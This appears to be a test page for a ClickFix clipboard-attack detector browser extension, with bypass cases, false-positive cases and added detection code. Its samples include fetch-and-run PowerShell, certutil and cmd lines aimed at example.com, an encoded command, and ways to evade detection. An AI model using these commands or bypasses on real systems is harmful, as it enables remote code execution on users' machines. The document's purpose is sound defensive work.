HEAT Shield ClickFix Detector Bypass / False-Positive Demo

Bypasses expected: the content is copied to the clipboard and the extension does not block the page

1. navigator.clipboard.writeText() — no copy event

The detector only listens for copy/cut DOM events. The Clipboard API never fires one, so the regex is never consulted.

Note: this is what https://brew.sh/ uses to copy their install script to the clipboard, so by supporting navigator.clipboard.writeText() we might start falsely flagging sites like this.
powershell -w hidden -c iex(iwr https://example.com/p.ps1)

2. clipboardData.setData override

The page installs its own copy listener that swaps the clipboard payload while the visible selection stays benign. The detector regex is run against the benign selection, not against event.clipboardData.
Visible selection (what the regex sees)
I'm not a robot — verification code A1B2-C3D4
Payload that ends up on clipboard
powershell -w hidden -c iex(iwr https://example.com/p.ps1)
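Added example, not HEAT Shield's code: a content-script fragment that covers both surfaces above, the Clipboard API call (bypass 1) and a page-supplied copy handler that calls setData() (bypass 2), by wrapping navigator.clipboard.writeText() and by reading event.clipboardData from a bubble-phase listener on window, which runs after the page's own handler on a button or document has already placed its payload. The onText callback and the FakeWindow stand-in are assumptions made so the code runs offline; wrapping writeText() only takes effect in the page's JavaScript world (Chrome MV3 content scripts need "world": "MAIN" for that), which is also assumed here.

```javascript
// Added example, not HEAT Shield's code. onText(text, source) is the
// detector callback (assumed); FakeWindow is a constructed stand-in so the
// hooks can be exercised without a browser.
function installClipboardHooks(win, onText) {
  // Bypass 1: navigator.clipboard.writeText() fires no copy event, so wrap
  // the call itself. From an extension this is only visible when the script
  // runs in the page's world (Chrome MV3: "world": "MAIN"); assumption here.
  const clipboard = win.navigator && win.navigator.clipboard;
  if (clipboard && typeof clipboard.writeText === 'function') {
    const original = clipboard.writeText.bind(clipboard);
    clipboard.writeText = function (text) {
      onText(String(text), 'clipboard-api');
      return original(text);
    };
  }

  // Bypass 2: listen in the bubble phase on window so the page's own handler
  // (on a button or document) has already run; whatever it put into the
  // DataTransfer with setData() is readable via getData() during dispatch.
  // Only if nothing was set do we fall back to the visible selection.
  const onCopy = (event) => {
    const dt = event.clipboardData;
    const fromEvent = dt && typeof dt.getData === 'function' ? dt.getData('text/plain') : '';
    if (fromEvent) onText(fromEvent, 'copy-event');
    else onText(String(win.getSelection ? win.getSelection() : ''), 'selection');
  };
  win.addEventListener('copy', onCopy, false);
  win.addEventListener('cut', onCopy, false);
}

// Constructed stand-in for a browser window; a real content script passes
// the global `window` instead.
class FakeWindow {
  constructor(selection) {
    this.selection = selection;
    this.listeners = { copy: [], cut: [] };
    this.navigator = { clipboard: { writeText: async (t) => { this.written = t; } } };
  }
  addEventListener(type, fn) { this.listeners[type].push(fn); }
  getSelection() { return this.selection; }
  // Simulates a copy: the page's own handler runs first and may swap the
  // payload, then the window (extension) listeners run.
  dispatchCopy(pageHandler) {
    const store = {};
    const event = {
      clipboardData: {
        setData: (type, v) => { store[type] = v; },
        getData: (type) => store[type] || '',
      },
      preventDefault() {},
    };
    if (pageHandler) pageHandler(event);
    this.listeners.copy.forEach((fn) => fn(event));
  }
}

// Walks through the three cases and returns what the detector observed.
function demo() {
  const seen = [];
  const w = new FakeWindow("I'm not a robot - verification code A1B2-C3D4");
  installClipboardHooks(w, (text, source) => seen.push({ source, text }));
  w.navigator.clipboard.writeText('api payload');                 // bypass 1
  w.dispatchCopy((e) => {                                         // bypass 2
    e.clipboardData.setData('text/plain', 'swapped payload');
    e.preventDefault();
  });
  w.dispatchCopy(null);                                           // ordinary copy
  return seen;
}

console.log(demo());
```

A page that calls stopPropagation() inside its own copy handler still hides the swapped payload from the window listener, and a capture-phase listener sees the event before setData() has run, so neither listener position alone covers both cases; the writeText() wrap and the bubble-phase read are complementary, not alternatives.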

3. Anchor bypass — any non-whitespace prefix breaks ^\s*

The regex is anchored at the start of the string with only optional whitespace allowed before the command name. Any other prefix — a quote, a full executable path, a shell sigil — defeats the match. Two common variants below.
"powershell" -w hidden -c iex(iwr https://example.com/p.ps1)
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -c iex(iwr https://example.com/p.ps1)

4. Argument whitelist too narrow

After the command name the regex requires one of -w | -c | -o | /c | https?://. Any other flag or sub-command bypasses the match — including standard PowerShell options (-NoProfile, -ExecutionPolicy, -EncodedCommand) and cmd /k, which keeps the shell open instead of /c.
powershell -NoProfile -ExecutionPolicy Bypass -EncodedCommand SQBuAHYAbwBrAGUALQBXAGUAYgBSAGUAcQB1AGUAcwB0ACAAaAB0AHQAcABzADoALwAvAGUAeABhAG0AcABsAGUALgBjAG8AbQA=
cmd /k curl -o %TEMP%\p.exe https://example.com/p.exe && %TEMP%\p.exe

5. Zero-width separator between command and flag

\s in a JS regex does not match U+200B (zero-width space). On most setups the Run dialog or shell still treats it as whitespace, or the user's paste tooling normalises it away.
powershell​-c iex(iwr https://example.com/p.ps1)

6. Unlisted binaries — pwsh, certutil, mshta vbscript:

PowerShell 7+ uses pwsh; LOLBins like certutil, bitsadmin, regsvr32, rundll32 and wscript aren't listed. mshta with a vbscript: URL is also missed (no http(s) prefix).
pwsh -c iex(iwr https://example.com/p.ps1)
certutil -urlcache -split -f https://example.com/p.exe %TEMP%\p.exe
mshta vbscript:CreateObject("WScript.Shell").Run("notepad")(window.close)

7. <iframe srcdoc> — content script not injected

The manifest sets match_about_blank: false, and *://*/* doesn't cover about:srcdoc, so code inside the iframe runs with no detector present.

8. Split-payload — chunks individually below the regex

ClickFix instructions often have the user copy the payload in pieces ("press Win+R, paste this, then this…"). No individual chunk matches.
powershell
 -w hidden -c "iex(iwr https://example.com/p.ps1)"

False positives expected: a legitimate copy is prevented and the page is blocked

F1. Homebrew install (brew.sh, copy-pasted verbatim)

Matches /bin/bash -c.

Note: brew.sh itself doesn't use the copy method this demo's copy button uses; brew.sh calls navigator.clipboard.writeText(), which the extension does not detect (see bypass 1).
/bin/bash -c "$(curl -fsSL https://raw.githubusercontent.com/Homebrew/install/HEAD/install.sh)"

F2. Common curl https://… snippet

Matches curl https?://. Stack Overflow, GitHub READMEs, AWS/GCP/Azure docs and LLM chat UIs all routinely emit lines like these — copying any of them is blocked.

Example in the wild: copy the curl https://[my domain or IP address] snippet from the top answer at https://stackoverflow.com/questions/10079707/https-connection-using-curl-from-command-line (skip the leading cmd> prompt).
curl https://api.github.com/repos/anthropics/claude-code
curl https://api.openai.com/v1/models -H "Authorization: Bearer $TOKEN"

F3. curl -o release download

Matches curl -o.

Example: matches the third copy code box here: https://everything.curl.dev/cmdline/options/short.html

Example: highlight and copy the curl -o command here: https://medium.com/@punya8147_26846/aws-cli-essentials-setup-across-mac-windows-and-linux-6246d017a8ac
curl -o kubectl https://dl.k8s.io/release/v1.30.0/bin/linux/amd64/kubectl

F4. Microsoft Learn — powershell -c example

Matches powershell -c. The argument is a benign cmdlet.
powershell -c "Get-Service -Name Spooler"

F5. Windows IT support snippet — cmd /c

Matches cmd /c. Common in helpdesk articles.
cmd /c ipconfig /flushdns

F6. mshta https://…

Matches mshta https?://. Legit (if rare) admin usage exists.
mshta https://internal.intranet.example.com/dashboard.hta
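Added example, not HEAT Shield's code, serving both halves of this page: bypasses 3 to 6 and 8 (anchor, argument whitelist, zero-width separator, unlisted binaries, split payload) and false positives F1 to F6. Instead of the anchored ^\s*<name> (-w|-c|-o|/c|https?://) regex it scores weighted behavioural indicators over normalised text and keeps a short per-session history so chunked copies are classified together. The indicator set, the weights, the threshold of 2 and the session window are assumptions; classify, normalise, ClipboardSession and run are names chosen for this example; the sample strings are this page's own lines.

```javascript
// Added example, not HEAT Shield's code. Weights, the threshold and the
// session window are assumptions; the samples below are this page's lines.

// Zero-width characters that \s never matches but that a Run dialog or
// terminal treats as, or normalises to, a separator (bypass 5).
const ZERO_WIDTH = /[\u200B\u200C\u200D\u2060\uFEFF]/g;

// Interpreters and LOLBins matched anywhere in the text, after an optional
// drive-letter path, a quote, a shell operator or a slash (bypasses 3, 6).
const LAUNCHER = /(?:^|[\s"'`;&|(\/])(?:[a-z]:\\[^\s"']*\\)?(powershell|pwsh|cmd|mshta|certutil|bitsadmin|regsvr32|rundll32|wscript|cscript|bash|sh|curl|wget)(?:\.exe)?\b/i;

// Behavioural indicators (bypass 4). A launcher name adds 1, so a bare
// "powershell -c <cmdlet>" or "curl https://..." scores 1 and is not flagged.
const INDICATORS = [
  { name: 'hidden-window',    weight: 2, re: /-w(?:indowstyle)?\s+hidden/i },
  { name: 'remote-exec',      weight: 2, re: /\b(?:iex|invoke-expression|iwr|invoke-webrequest|downloadstring|downloadfile)\b/i },
  { name: 'encoded-command',  weight: 2, re: /-e(?:c|nc|ncodedcommand)?\s+[a-z0-9+\/=]{40,}/i },
  { name: 'policy-bypass',    weight: 1, re: /-e(?:p|x|xecutionpolicy)\s+(?:bypass|unrestricted)/i },
  { name: 'temp-path',        weight: 1, re: /%(?:temp|appdata|localappdata)%|\$env:(?:temp|appdata)/i },
  { name: 'runs-temp-file',   weight: 2, re: /(?:&&|;|\|)\s*(?:%(?:temp|appdata|localappdata)%|\$env:temp)\\/i },
  { name: 'lolbin-download',  weight: 2, re: /certutil\b.*-urlcache|bitsadmin\b.*\/transfer/i },
  { name: 'mshta-script-url', weight: 2, re: /mshta\s+(?:vbscript|javascript):/i },
];
const THRESHOLD = 2;

// Replace zero-width characters with a plain space so the tokens separate.
function normalise(text) {
  return text.replace(ZERO_WIDTH, ' ');
}

// Returns { flagged, score, launcher, indicators } for one clipboard text.
function classify(text) {
  const t = normalise(text);
  const m = LAUNCHER.exec(t);
  const launcher = m ? m[1].toLowerCase() : null;
  const hits = INDICATORS.filter((i) => i.re.test(t));
  const score = (launcher ? 1 : 0) + hits.reduce((s, i) => s + i.weight, 0);
  return { flagged: score >= THRESHOLD, score, launcher, indicators: hits.map((i) => i.name) };
}

// Bypass 8: a payload copied in pieces. Keep the last few copies made on the
// same page within a short window and also classify their concatenation.
class ClipboardSession {
  constructor(windowMs = 60000, maxChunks = 5) {
    this.windowMs = windowMs;
    this.maxChunks = maxChunks;
    this.chunks = [];
  }
  observe(text, now = Date.now()) {
    this.chunks.push({ text, now });
    this.chunks = this.chunks.filter((c) => now - c.now <= this.windowMs).slice(-this.maxChunks);
    const single = classify(text);
    const joined = classify(this.chunks.map((c) => c.text).join(' '));
    return joined.score > single.score ? { ...joined, split: true } : { ...single, split: false };
  }
}

// Constructed from this page's samples: bypass lines should be flagged,
// false-positive lines should not.
const SAMPLES = {
  bypass3_quoted: '"powershell" -w hidden -c iex(iwr https://example.com/p.ps1)',
  bypass3_fullpath: 'C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe -c iex(iwr https://example.com/p.ps1)',
  bypass4_encoded: 'powershell -NoProfile -ExecutionPolicy Bypass -EncodedCommand SQBuAHYAbwBrAGUALQBXAGUAYgBSAGUAcQB1AGUAcwB0ACAAaAB0AHQAcABzADoALwAvAGUAeABhAG0AcABsAGUALgBjAG8AbQA=',
  bypass4_cmdk: 'cmd /k curl -o %TEMP%\\p.exe https://example.com/p.exe && %TEMP%\\p.exe',
  bypass5_zerowidth: 'powershell\u200B-c iex(iwr https://example.com/p.ps1)',
  bypass6_mshta: 'mshta vbscript:CreateObject("WScript.Shell").Run("notepad")(window.close)',
  fp1_homebrew: '/bin/bash -c "$(curl -fsSL https://raw.githubusercontent.com/Homebrew/install/HEAD/install.sh)"',
  fp3_kubectl: 'curl -o kubectl https://dl.k8s.io/release/v1.30.0/bin/linux/amd64/kubectl',
  fp4_cmdlet: 'powershell -c "Get-Service -Name Spooler"',
  fp6_mshta_https: 'mshta https://internal.intranet.example.com/dashboard.hta',
};

// Returns { sampleName: flagged } for every sample above.
function run() {
  return Object.fromEntries(Object.entries(SAMPLES).map(([k, v]) => [k, classify(v).flagged]));
}

console.log(run());
```

The design choice is that a command name on its own is never enough: "curl https://", "powershell -c", "cmd /c" and "mshta https://" all score 1 and pass, while the bypass lines score 3 to 5 because they carry what a ClickFix payload actually needs (a hidden window, a remote fetch-and-eval, an encoded command, a write to %TEMP% that is then executed, a LOLBin download, or a vbscript:/javascript: URL). The F1 Homebrew line also passes here; flagging shell substitution of a curl download would need its own indicator and would bring F1 straight back as a false positive.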